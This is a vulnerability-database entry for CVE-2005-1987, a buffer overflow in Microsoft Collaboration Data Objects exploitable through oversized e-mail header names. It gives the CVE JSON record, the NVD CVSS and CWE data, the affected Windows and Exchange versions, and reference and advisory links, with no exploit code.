CVE-2005-1987 (GCVE-0-2005-1987)

Vulnerability from cvelistv5 – Published: 2005-10-13 04:00 – Updated: 2024-08-07 22:06

Summary

Severity

No CVSS data available.

CWE

Assigner

microsoft

References

19 references

URL	Tags
http://www.osvdb.org/19905	vdb-entryx_refsource_OSVDB
http://support.microsoft.com/default.aspx?scid=kb…	vendor-advisoryx_refsource_MSKB
https://oval.cisecurity.org/repository/search/def…	vdb-entrysignaturex_refsource_OVAL
https://oval.cisecurity.org/repository/search/def…	vdb-entrysignaturex_refsource_OVAL
http://www.kb.cert.org/vuls/id/883460	third-party-advisoryx_refsource_CERT-VN
https://oval.cisecurity.org/repository/search/def…	vdb-entrysignaturex_refsource_OVAL
https://oval.cisecurity.org/repository/search/def…	vdb-entrysignaturex_refsource_OVAL
https://exchange.xforce.ibmcloud.com/vulnerabilit…	vdb-entryx_refsource_XF
http://secunia.com/advisories/17167	third-party-advisoryx_refsource_SECUNIA
http://www.securityfocus.com/bid/15067	vdb-entryx_refsource_BID
https://oval.cisecurity.org/repository/search/def…	vdb-entrysignaturex_refsource_OVAL
https://docs.microsoft.com/en-us/security-updates…	vendor-advisoryx_refsource_MS
https://oval.cisecurity.org/repository/search/def…	vdb-entrysignaturex_refsource_OVAL
https://oval.cisecurity.org/repository/search/def…	vdb-entrysignaturex_refsource_OVAL
http://www.us-cert.gov/cas/techalerts/TA05-284A.html	third-party-advisoryx_refsource_CERT
http://securitytracker.com/id?1015038	vdb-entryx_refsource_SECTRACK
http://archives.neohapsis.com/archives/fulldisclo…	mailing-listx_refsource_FULLDISC
http://marc.info/?l=bugtraq&m=112915118302012&w=2	mailing-listx_refsource_BUGTRAQ
http://securitytracker.com/id?1015039	vdb-entryx_refsource_SECTRACK

Date Public

2005-10-11 00:00

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-07T22:06:57.831Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "19905",
            "tags": [
              "vdb-entry",
              "x_refsource_OSVDB",
              "x_transferred"
            ],
            "url": "http://www.osvdb.org/19905"
          },
          {
            "name": "Q907245",
            "tags": [
              "vendor-advisory",
              "x_refsource_MSKB",
              "x_transferred"
            ],
            "url": "http://support.microsoft.com/default.aspx?scid=kb%3B%5BLN%5D%3BQ907245"
          },
          {
            "name": "oval:org.mitre.oval:def:581",
            "tags": [
              "vdb-entry",
              "signature",
              "x_refsource_OVAL",
              "x_transferred"
            ],
            "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A581"
          },
          {
            "name": "oval:org.mitre.oval:def:1406",
            "tags": [
              "vdb-entry",
              "signature",
              "x_refsource_OVAL",
              "x_transferred"
            ],
            "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1406"
          },
          {
            "name": "VU#883460",
            "tags": [
              "third-party-advisory",
              "x_refsource_CERT-VN",
              "x_transferred"
            ],
            "url": "http://www.kb.cert.org/vuls/id/883460"
          },
          {
            "name": "oval:org.mitre.oval:def:848",
            "tags": [
              "vdb-entry",
              "signature",
              "x_refsource_OVAL",
              "x_transferred"
            ],
            "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A848"
          },
          {
            "name": "oval:org.mitre.oval:def:1515",
            "tags": [
              "vdb-entry",
              "signature",
              "x_refsource_OVAL",
              "x_transferred"
            ],
            "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1515"
          },
          {
            "name": "win-cdo-bo(22495)",
            "tags": [
              "vdb-entry",
              "x_refsource_XF",
              "x_transferred"
            ],
            "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/22495"
          },
          {
            "name": "17167",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/17167"
          },
          {
            "name": "15067",
            "tags": [
              "vdb-entry",
              "x_refsource_BID",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/bid/15067"
          },
          {
            "name": "oval:org.mitre.oval:def:1420",
            "tags": [
              "vdb-entry",
              "signature",
              "x_refsource_OVAL",
              "x_transferred"
            ],
            "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1420"
          },
          {
            "name": "MS05-048",
            "tags": [
              "vendor-advisory",
              "x_refsource_MS",
              "x_transferred"
            ],
            "url": "https://docs.microsoft.com/en-us/security-updates/securitybulletins/2005/ms05-048"
          },
          {
            "name": "oval:org.mitre.oval:def:1201",
            "tags": [
              "vdb-entry",
              "signature",
              "x_refsource_OVAL",
              "x_transferred"
            ],
            "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1201"
          },
          {
            "name": "oval:org.mitre.oval:def:1130",
            "tags": [
              "vdb-entry",
              "signature",
              "x_refsource_OVAL",
              "x_transferred"
            ],
            "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1130"
          },
          {
            "name": "TA05-284A",
            "tags": [
              "third-party-advisory",
              "x_refsource_CERT",
              "x_transferred"
            ],
            "url": "http://www.us-cert.gov/cas/techalerts/TA05-284A.html"
          },
          {
            "name": "1015038",
            "tags": [
              "vdb-entry",
              "x_refsource_SECTRACK",
              "x_transferred"
            ],
            "url": "http://securitytracker.com/id?1015038"
          },
          {
            "name": "20051012 [SEC-1 Advisory] Collaboration Data Objects Buffer Overflow Vulnerability",
            "tags": [
              "mailing-list",
              "x_refsource_FULLDISC",
              "x_transferred"
            ],
            "url": "http://archives.neohapsis.com/archives/fulldisclosure/2005-10/0289.html"
          },
          {
            "name": "20051012 [SEC-1 Advisory] Collaboration Data Objects Buffer Overflow Vulnerability",
            "tags": [
              "mailing-list",
              "x_refsource_BUGTRAQ",
              "x_transferred"
            ],
            "url": "http://marc.info/?l=bugtraq\u0026m=112915118302012\u0026w=2"
          },
          {
            "name": "1015039",
            "tags": [
              "vdb-entry",
              "x_refsource_SECTRACK",
              "x_transferred"
            ],
            "url": "http://securitytracker.com/id?1015039"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2005-10-11T00:00:00.000Z",
      "descriptions": [
        {
          "lang": "en",
          "value": "Buffer overflow in Collaboration Data Objects (CDO), as used in Microsoft Windows and Microsoft Exchange Server, allows remote attackers to execute arbitrary code when CDOSYS or CDOEX processes an e-mail message with a large header name, as demonstrated using the \"Content-Type\" string."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2018-10-12T19:57:01.000Z",
        "orgId": "f38d906d-7342-40ea-92c1-6c4a2c6478c8",
        "shortName": "microsoft"
      },
      "references": [
        {
          "name": "19905",
          "tags": [
            "vdb-entry",
            "x_refsource_OSVDB"
          ],
          "url": "http://www.osvdb.org/19905"
        },
        {
          "name": "Q907245",
          "tags": [
            "vendor-advisory",
            "x_refsource_MSKB"
          ],
          "url": "http://support.microsoft.com/default.aspx?scid=kb%3B%5BLN%5D%3BQ907245"
        },
        {
          "name": "oval:org.mitre.oval:def:581",
          "tags": [
            "vdb-entry",
            "signature",
            "x_refsource_OVAL"
          ],
          "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A581"
        },
        {
          "name": "oval:org.mitre.oval:def:1406",
          "tags": [
            "vdb-entry",
            "signature",
            "x_refsource_OVAL"
          ],
          "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1406"
        },
        {
          "name": "VU#883460",
          "tags": [
            "third-party-advisory",
            "x_refsource_CERT-VN"
          ],
          "url": "http://www.kb.cert.org/vuls/id/883460"
        },
        {
          "name": "oval:org.mitre.oval:def:848",
          "tags": [
            "vdb-entry",
            "signature",
            "x_refsource_OVAL"
          ],
          "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A848"
        },
        {
          "name": "oval:org.mitre.oval:def:1515",
          "tags": [
            "vdb-entry",
            "signature",
            "x_refsource_OVAL"
          ],
          "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1515"
        },
        {
          "name": "win-cdo-bo(22495)",
          "tags": [
            "vdb-entry",
            "x_refsource_XF"
          ],
          "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/22495"
        },
        {
          "name": "17167",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/17167"
        },
        {
          "name": "15067",
          "tags": [
            "vdb-entry",
            "x_refsource_BID"
          ],
          "url": "http://www.securityfocus.com/bid/15067"
        },
        {
          "name": "oval:org.mitre.oval:def:1420",
          "tags": [
            "vdb-entry",
            "signature",
            "x_refsource_OVAL"
          ],
          "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1420"
        },
        {
          "name": "MS05-048",
          "tags": [
            "vendor-advisory",
            "x_refsource_MS"
          ],
          "url": "https://docs.microsoft.com/en-us/security-updates/securitybulletins/2005/ms05-048"
        },
        {
          "name": "oval:org.mitre.oval:def:1201",
          "tags": [
            "vdb-entry",
            "signature",
            "x_refsource_OVAL"
          ],
          "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1201"
        },
        {
          "name": "oval:org.mitre.oval:def:1130",
          "tags": [
            "vdb-entry",
            "signature",
            "x_refsource_OVAL"
          ],
          "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1130"
        },
        {
          "name": "TA05-284A",
          "tags": [
            "third-party-advisory",
            "x_refsource_CERT"
          ],
          "url": "http://www.us-cert.gov/cas/techalerts/TA05-284A.html"
        },
        {
          "name": "1015038",
          "tags": [
            "vdb-entry",
            "x_refsource_SECTRACK"
          ],
          "url": "http://securitytracker.com/id?1015038"
        },
        {
          "name": "20051012 [SEC-1 Advisory] Collaboration Data Objects Buffer Overflow Vulnerability",
          "tags": [
            "mailing-list",
            "x_refsource_FULLDISC"
          ],
          "url": "http://archives.neohapsis.com/archives/fulldisclosure/2005-10/0289.html"
        },
        {
          "name": "20051012 [SEC-1 Advisory] Collaboration Data Objects Buffer Overflow Vulnerability",
          "tags": [
            "mailing-list",
            "x_refsource_BUGTRAQ"
          ],
          "url": "http://marc.info/?l=bugtraq\u0026m=112915118302012\u0026w=2"
        },
        {
          "name": "1015039",
          "tags": [
            "vdb-entry",
            "x_refsource_SECTRACK"
          ],
          "url": "http://securitytracker.com/id?1015039"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "secure@microsoft.com",
          "ID": "CVE-2005-1987",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "Buffer overflow in Collaboration Data Objects (CDO), as used in Microsoft Windows and Microsoft Exchange Server, allows remote attackers to execute arbitrary code when CDOSYS or CDOEX processes an e-mail message with a large header name, as demonstrated using the \"Content-Type\" string."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "19905",
              "refsource": "OSVDB",
              "url": "http://www.osvdb.org/19905"
            },
            {
              "name": "Q907245",
              "refsource": "MSKB",
              "url": "http://support.microsoft.com/default.aspx?scid=kb;[LN];Q907245"
            },
            {
              "name": "oval:org.mitre.oval:def:581",
              "refsource": "OVAL",
              "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A581"
            },
            {
              "name": "oval:org.mitre.oval:def:1406",
              "refsource": "OVAL",
              "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1406"
            },
            {
              "name": "VU#883460",
              "refsource": "CERT-VN",
              "url": "http://www.kb.cert.org/vuls/id/883460"
            },
            {
              "name": "oval:org.mitre.oval:def:848",
              "refsource": "OVAL",
              "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A848"
            },
            {
              "name": "oval:org.mitre.oval:def:1515",
              "refsource": "OVAL",
              "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1515"
            },
            {
              "name": "win-cdo-bo(22495)",
              "refsource": "XF",
              "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/22495"
            },
            {
              "name": "17167",
              "refsource": "SECUNIA",
              "url": "http://secunia.com/advisories/17167"
            },
            {
              "name": "15067",
              "refsource": "BID",
              "url": "http://www.securityfocus.com/bid/15067"
            },
            {
              "name": "oval:org.mitre.oval:def:1420",
              "refsource": "OVAL",
              "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1420"
            },
            {
              "name": "MS05-048",
              "refsource": "MS",
              "url": "https://docs.microsoft.com/en-us/security-updates/securitybulletins/2005/ms05-048"
            },
            {
              "name": "oval:org.mitre.oval:def:1201",
              "refsource": "OVAL",
              "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1201"
            },
            {
              "name": "oval:org.mitre.oval:def:1130",
              "refsource": "OVAL",
              "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1130"
            },
            {
              "name": "TA05-284A",
              "refsource": "CERT",
              "url": "http://www.us-cert.gov/cas/techalerts/TA05-284A.html"
            },
            {
              "name": "1015038",
              "refsource": "SECTRACK",
              "url": "http://securitytracker.com/id?1015038"
            },
            {
              "name": "20051012 [SEC-1 Advisory] Collaboration Data Objects Buffer Overflow Vulnerability",
              "refsource": "FULLDISC",
              "url": "http://archives.neohapsis.com/archives/fulldisclosure/2005-10/0289.html"
            },
            {
              "name": "20051012 [SEC-1 Advisory] Collaboration Data Objects Buffer Overflow Vulnerability",
              "refsource": "BUGTRAQ",
              "url": "http://marc.info/?l=bugtraq\u0026m=112915118302012\u0026w=2"
            },
            {
              "name": "1015039",
              "refsource": "SECTRACK",
              "url": "http://securitytracker.com/id?1015039"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "f38d906d-7342-40ea-92c1-6c4a2c6478c8",
    "assignerShortName": "microsoft",
    "cveId": "CVE-2005-1987",
    "datePublished": "2005-10-13T04:00:00.000Z",
    "dateReserved": "2005-06-17T00:00:00.000Z",
    "dateUpdated": "2024-08-07T22:06:57.831Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1",
  "vulnerability-lookup:meta": {
    "epss": {
      "cve": "CVE-2005-1987",
      "date": "2026-06-16",
      "epss": "0.43446",
      "percentile": "0.98566"
    },
    "nvd": "{\"cve\":{\"id\":\"CVE-2005-1987\",\"sourceIdentifier\":\"secure@microsoft.com\",\"published\":\"2005-10-13T10:02:00.000\",\"lastModified\":\"2026-04-16T00:27:16.627\",\"vulnStatus\":\"Modified\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Buffer overflow in Collaboration Data Objects (CDO), as used in Microsoft Windows and Microsoft Exchange Server, allows remote attackers to execute arbitrary code when CDOSYS or CDOEX processes an e-mail message with a large header name, as demonstrated using the \\\"Content-Type\\\" string.\"}],\"metrics\":{\"cvssMetricV2\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"2.0\",\"vectorString\":\"AV:N/AC:L/Au:N/C:P/I:P/A:P\",\"baseScore\":7.5,\"accessVector\":\"NETWORK\",\"accessComplexity\":\"LOW\",\"authentication\":\"NONE\",\"confidentialityImpact\":\"PARTIAL\",\"integrityImpact\":\"PARTIAL\",\"availabilityImpact\":\"PARTIAL\"},\"baseSeverity\":\"HIGH\",\"exploitabilityScore\":10.0,\"impactScore\":6.4,\"acInsufInfo\":false,\"obtainAllPrivilege\":false,\"obtainUserPrivilege\":true,\"obtainOtherPrivilege\":false,\"userInteractionRequired\":false}]},\"weaknesses\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-120\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:microsoft:exchange_server:2000:sp3:*:*:*:*:*:*\",\"matchCriteriaId\":\"E88E31D4-1120-4A18-BA65-E2C96B35E599\"}]}]},{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:microsoft:windows_2000:-:sp4:*:fr:*:*:*:*\",\"matchCriteriaId\":\"9FB47735-C33C-43B6-9AC6-E5ECAB18AF47\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:microsoft:windows_server_2003:-:*:*:*:*:*:itanium:*\",\"matchCriteriaId\":\"5AA32D8C-430E-4CA2-B2DF-FFF63714F480\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:microsoft:windows_server_2003:-:*:*:*:*:*:x64:*\",\"matchCriteriaId\":\"E3C43D05-40F8-4769-BA6B-A376420EA972\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:microsoft:windows_server_2003:r2:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"23C65B29-89C4-4C05-BD53-27CAD31810A1\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:microsoft:windows_server_2003:sp1:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"97474F37-792B-4FD1-B8B8-3AAC050DF327\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:microsoft:windows_server_2003:sp1:*:*:*:*:*:itanium:*\",\"matchCriteriaId\":\"92759831-AC3F-4F01-919F-8C0BAFE15352\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:microsoft:windows_xp:-:*:*:*:*:*:x64:*\",\"matchCriteriaId\":\"949AD335-71B5-4C93-8698-6C17119CE7A7\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:microsoft:windows_xp:-:sp1:*:*:tablet_pc:*:*:*\",\"matchCriteriaId\":\"24FD61D1-518D-47D1-969E-81E3CBCB15FA\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:microsoft:windows_xp:-:sp2:*:*:tablet_pc:*:*:*\",\"matchCriteriaId\":\"BD92FDA6-5BD1-4AAD-B1BE-60B477E35316\"}]}]}],\"references\":[{\"url\":\"http://archives.neohapsis.com/archives/fulldisclosure/2005-10/0289.html\",\"source\":\"secure@microsoft.com\",\"tags\":[\"Broken Link\"]},{\"url\":\"http://marc.info/?l=bugtraq\u0026m=112915118302012\u0026w=2\",\"source\":\"secure@microsoft.com\",\"tags\":[\"Mailing List\",\"Third Party Advisory\"]},{\"url\":\"http://secunia.com/advisories/17167\",\"source\":\"secure@microsoft.com\",\"tags\":[\"Third Party Advisory\"]},{\"url\":\"http://securitytracker.com/id?1015038\",\"source\":\"secure@microsoft.com\",\"tags\":[\"Third Party Advisory\",\"VDB Entry\"]},{\"url\":\"http://securitytracker.com/id?1015039\",\"source\":\"secure@microsoft.com\",\"tags\":[\"Third Party Advisory\",\"VDB Entry\"]},{\"url\":\"http://support.microsoft.com/default.aspx?scid=kb%3B%5BLN%5D%3BQ907245\",\"source\":\"secure@microsoft.com\"},{\"url\":\"http://www.kb.cert.org/vuls/id/883460\",\"source\":\"secure@microsoft.com\",\"tags\":[\"Third Party Advisory\",\"US Government Resource\"]},{\"url\":\"http://www.osvdb.org/19905\",\"source\":\"secure@microsoft.com\",\"tags\":[\"Broken Link\"]},{\"url\":\"http://www.securityfocus.com/bid/15067\",\"source\":\"secure@microsoft.com\",\"tags\":[\"Third Party Advisory\",\"VDB Entry\"]},{\"url\":\"http://www.us-cert.gov/cas/techalerts/TA05-284A.html\",\"source\":\"secure@microsoft.com\",\"tags\":[\"Third Party Advisory\",\"US Government Resource\"]},{\"url\":\"https://docs.microsoft.com/en-us/security-updates/securitybulletins/2005/ms05-048\",\"source\":\"secure@microsoft.com\",\"tags\":[\"Patch\",\"Vendor Advisory\"]},{\"url\":\"https://exchange.xforce.ibmcloud.com/vulnerabilities/22495\",\"source\":\"secure@microsoft.com\",\"tags\":[\"Third Party Advisory\",\"VDB Entry\"]},{\"url\":\"https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1130\",\"source\":\"secure@microsoft.com\",\"tags\":[\"Third Party Advisory\"]},{\"url\":\"https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1201\",\"source\":\"secure@microsoft.com\",\"tags\":[\"Third Party Advisory\"]},{\"url\":\"https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1406\",\"source\":\"secure@microsoft.com\",\"tags\":[\"Third Party Advisory\"]},{\"url\":\"https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1420\",\"source\":\"secure@microsoft.com\",\"tags\":[\"Third Party Advisory\"]},{\"url\":\"https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1515\",\"source\":\"secure@microsoft.com\",\"tags\":[\"Third Party Advisory\"]},{\"url\":\"https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A581\",\"source\":\"secure@microsoft.com\",\"tags\":[\"Third Party Advisory\"]},{\"url\":\"https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A848\",\"source\":\"secure@microsoft.com\",\"tags\":[\"Third Party Advisory\"]},{\"url\":\"http://archives.neohapsis.com/archives/fulldisclosure/2005-10/0289.html\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Broken Link\"]},{\"url\":\"http://marc.info/?l=bugtraq\u0026m=112915118302012\u0026w=2\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Mailing List\",\"Third Party Advisory\"]},{\"url\":\"http://secunia.com/advisories/17167\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Third Party Advisory\"]},{\"url\":\"http://securitytracker.com/id?1015038\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Third Party Advisory\",\"VDB Entry\"]},{\"url\":\"http://securitytracker.com/id?1015039\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Third Party Advisory\",\"VDB Entry\"]},{\"url\":\"http://support.microsoft.com/default.aspx?scid=kb%3B%5BLN%5D%3BQ907245\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"http://www.kb.cert.org/vuls/id/883460\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Third Party Advisory\",\"US Government Resource\"]},{\"url\":\"http://www.osvdb.org/19905\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Broken Link\"]},{\"url\":\"http://www.securityfocus.com/bid/15067\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Third Party Advisory\",\"VDB Entry\"]},{\"url\":\"http://www.us-cert.gov/cas/techalerts/TA05-284A.html\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Third Party Advisory\",\"US Government Resource\"]},{\"url\":\"https://docs.microsoft.com/en-us/security-updates/securitybulletins/2005/ms05-048\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Patch\",\"Vendor Advisory\"]},{\"url\":\"https://exchange.xforce.ibmcloud.com/vulnerabilities/22495\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Third Party Advisory\",\"VDB Entry\"]},{\"url\":\"https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1130\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Third Party Advisory\"]},{\"url\":\"https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1201\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Third Party Advisory\"]},{\"url\":\"https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1406\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Third Party Advisory\"]},{\"url\":\"https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1420\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Third Party Advisory\"]},{\"url\":\"https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1515\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Third Party Advisory\"]},{\"url\":\"https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A581\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Third Party Advisory\"]},{\"url\":\"https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A848\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Third Party Advisory\"]}]}}"
  }
}

FKIE_CVE-2005-1987

Vulnerability from fkie_nvd - Published: 2005-10-13 10:02 - Updated: 2026-04-16 00:27

Severity

Summary

References

URL	Tags
secure@microsoft.com	http://archives.neohapsis.com/archives/fulldisclosure/2005-10/0289.html	Broken Link
secure@microsoft.com	http://marc.info/?l=bugtraq&m=112915118302012&w=2	Mailing List, Third Party Advisory
secure@microsoft.com	http://secunia.com/advisories/17167	Third Party Advisory
secure@microsoft.com	http://securitytracker.com/id?1015038	Third Party Advisory, VDB Entry
secure@microsoft.com	http://securitytracker.com/id?1015039	Third Party Advisory, VDB Entry
secure@microsoft.com	http://support.microsoft.com/default.aspx?scid=kb%3B%5BLN%5D%3BQ907245
secure@microsoft.com	http://www.kb.cert.org/vuls/id/883460	Third Party Advisory, US Government Resource
secure@microsoft.com	http://www.osvdb.org/19905	Broken Link
secure@microsoft.com	http://www.securityfocus.com/bid/15067	Third Party Advisory, VDB Entry
secure@microsoft.com	http://www.us-cert.gov/cas/techalerts/TA05-284A.html	Third Party Advisory, US Government Resource
secure@microsoft.com	https://docs.microsoft.com/en-us/security-updates/securitybulletins/2005/ms05-048	Patch, Vendor Advisory
secure@microsoft.com	https://exchange.xforce.ibmcloud.com/vulnerabilities/22495	Third Party Advisory, VDB Entry
secure@microsoft.com	https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1130	Third Party Advisory
secure@microsoft.com	https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1201	Third Party Advisory
secure@microsoft.com	https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1406	Third Party Advisory
secure@microsoft.com	https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1420	Third Party Advisory
secure@microsoft.com	https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1515	Third Party Advisory
secure@microsoft.com	https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A581	Third Party Advisory
secure@microsoft.com	https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A848	Third Party Advisory
af854a3a-2127-422b-91ae-364da2661108	http://archives.neohapsis.com/archives/fulldisclosure/2005-10/0289.html	Broken Link
af854a3a-2127-422b-91ae-364da2661108	http://marc.info/?l=bugtraq&m=112915118302012&w=2	Mailing List, Third Party Advisory
af854a3a-2127-422b-91ae-364da2661108	http://secunia.com/advisories/17167	Third Party Advisory
af854a3a-2127-422b-91ae-364da2661108	http://securitytracker.com/id?1015038	Third Party Advisory, VDB Entry
af854a3a-2127-422b-91ae-364da2661108	http://securitytracker.com/id?1015039	Third Party Advisory, VDB Entry
af854a3a-2127-422b-91ae-364da2661108	http://support.microsoft.com/default.aspx?scid=kb%3B%5BLN%5D%3BQ907245
af854a3a-2127-422b-91ae-364da2661108	http://www.kb.cert.org/vuls/id/883460	Third Party Advisory, US Government Resource
af854a3a-2127-422b-91ae-364da2661108	http://www.osvdb.org/19905	Broken Link
af854a3a-2127-422b-91ae-364da2661108	http://www.securityfocus.com/bid/15067	Third Party Advisory, VDB Entry
af854a3a-2127-422b-91ae-364da2661108	http://www.us-cert.gov/cas/techalerts/TA05-284A.html	Third Party Advisory, US Government Resource
af854a3a-2127-422b-91ae-364da2661108	https://docs.microsoft.com/en-us/security-updates/securitybulletins/2005/ms05-048	Patch, Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	https://exchange.xforce.ibmcloud.com/vulnerabilities/22495	Third Party Advisory, VDB Entry
